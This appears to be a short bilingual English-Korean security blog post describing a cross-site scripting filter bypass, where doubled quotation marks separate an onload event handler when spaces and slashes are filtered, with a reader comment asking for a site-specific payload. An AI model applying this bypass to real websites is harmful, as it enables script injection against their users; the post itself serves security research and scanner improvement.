Bypass blank,slash filter for XSS to simple trick (double-double ")

Hi, hackers.
The XSS pattern I’m going to talk to you about today… but It’s not a new technique, it’s something. I did not know that...
Event Handler XSS is usually a difficult situation when slashes and blank characters are being filtered.
The ""(double-double &quot) processed value of the HTML properties allows you to isolate the property value, or event handler, without spaces or slashes in a particular environment.

오늘 이야기드릴 XSS 패턴은.. 새로운 기법은 아니고, 제가 모르고 있던 방법이였습니다.
(페이로드들 자세히좀 살펴볼껄..)

보통 슬래시와 공백문자가 필터링 중일 떄 일반적으로 이벤트 핸들러를 이용한 XSS는 어려운 상황입니다.
HTML 속성 중 “” 처리한 값을 잘 이용하면 특정 환경에선 속성값 즉 이벤트 핸들러를 공백이나 슬래시 없이 분리해 낼 수 있습니다.


if filtered slash, blank
just simple.


원리(Why Execute?)

Can split the HTML properties using “” after inserting the attribute values through a space or slash in the HTML tag.

처음 공백이나 / 이후로 태그 위치에서 분리된 경우 “” 를 통해 HTML 속성 간 분리가 가능합니다.
그래서 겉보기엔 whatthe라는 이벤트 핸들러에 “”, 다음 문자인 onload=alert(45)는 속성처리 되지 않을 것 같지만 문자열 이후 오는 첫번째 단어라서 속성으로 분리됩니다.

My case

/ => fileted
%20 => filtered
/; => not filted


XSpear updated

I added commit and update XSpear for this pattern.
바로 XSpear에도 업데이트 해두었습니다.

Add event handler pattern

Add common XSS Pattern

Add event handler pattern on 1.1.6 commit


Security engineer, Rubyist, Gopher and H4cker!

Share: | Coffee Me:


  1. hi bro ,
    Iam following your write ups about your xss bug hunting in your blog .
    can u help me to create a payload on website which is filtering only these symbols
    the website is not filtering the below symbols
    ' / ; ( )

    and we can only execute these payloads in < p > our code < / p > tags.

    thin advance broanks :)

    1. Hi.
      If your code is inserted in an HTML area, <> is required.
      However, if there is a part that references <p> </p> code and causes DOM Write, there is a possibility of DOM XSS.

      Typically hunters, passes in the html area where lt, gt with encoding is not possible.

      Happy Hacking!